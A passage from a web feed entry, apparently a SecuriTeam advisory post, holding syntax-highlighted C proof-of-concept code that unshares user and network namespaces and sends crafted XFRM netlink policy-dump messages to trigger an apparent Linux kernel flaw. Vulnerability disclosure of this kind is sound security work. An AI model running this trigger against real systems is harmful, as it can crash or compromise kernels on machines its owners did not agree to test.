crayon-striped-line\" id=\"crayon-5a17495be4781046175041-18\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_nl <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-20\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nlmsghdr <\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">buf<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">BUFSIZE<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-23\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-25\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_nl_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-26\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">PF_NETLINK<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SOCK_RAW<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">NETLINK_XFRM<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AF_NETLINK<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* packet goes into the kernel *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nl_groups<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRMNLGRP_NONE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* no need for multicast group *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-33\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-35\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">do_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-36\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">SO_RCVBUF<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-40\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-41\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-42\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-43\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">malloc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_policy<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;malloc&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_policy<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">XFRM_MSG_GETPOLICY<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_MATCH<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_MULTI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">NLM_F_REQUEST<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_seq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-59\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-60\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-61\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nlmsghdr *<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-62\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sendto<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;sendto&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-71\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-73\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-74\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-75\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWUSER<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-76\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unshare(CLONE_NEWUSER)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-77\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-78\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-79\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWNET<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-80\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;unshared(CLONE_NEWUSER)&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-81\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-82\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-83\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-84\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-85\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">create_nl_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">do_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-96\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0067 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3535\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" 